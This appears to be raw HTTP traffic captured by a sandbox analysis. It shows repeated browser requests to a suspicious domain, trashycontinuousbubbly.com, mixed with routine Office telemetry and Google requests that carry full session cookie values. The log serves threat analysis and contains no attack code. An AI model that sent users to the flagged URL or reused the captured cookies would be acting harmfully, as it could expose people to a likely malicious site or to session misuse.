Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-prefers-color-scheme: lightAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCIOFeQGZIyfLK3Q7dXdZISvHKCvV384m7j8oE2kpRPhOEVaS6gZo; NID=518=QZl9tNBxYnBCjVh9mcDFDMAGPTlPMMuZzjMwkr6yCzn54HQW-XHnsTrtYE7_QeIvOrB8wulYd7DpfvQcKY8a5SdNackSZ8tG6gE-SwJvS7xYzw5B8UpYzVQzqUWyex6rltqDXiQzUFXDdvD5mrp5T6JDO0xYsqbaJFbAZ8-NOntOVxyMIwMghSUTHSCQFRqzyxmK
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-prefers-color-scheme: lightAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCIOFeQGZIyfLK3Q7dXdZISvHKCvV384m7j8oE2kpRPhOEVaS6gZo; NID=518=QZl9tNBxYnBCjVh9mcDFDMAGPTlPMMuZzjMwkr6yCzn54HQW-XHnsTrtYE7_QeIvOrB8wulYd7DpfvQcKY8a5SdNackSZ8tG6gE-SwJvS7xYzw5B8UpYzVQzqUWyex6rltqDXiQzUFXDdvD5mrp5T6JDO0xYsqbaJFbAZ8-NOntOVxyMIwMghSUTHSCQFRqzyxmK
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
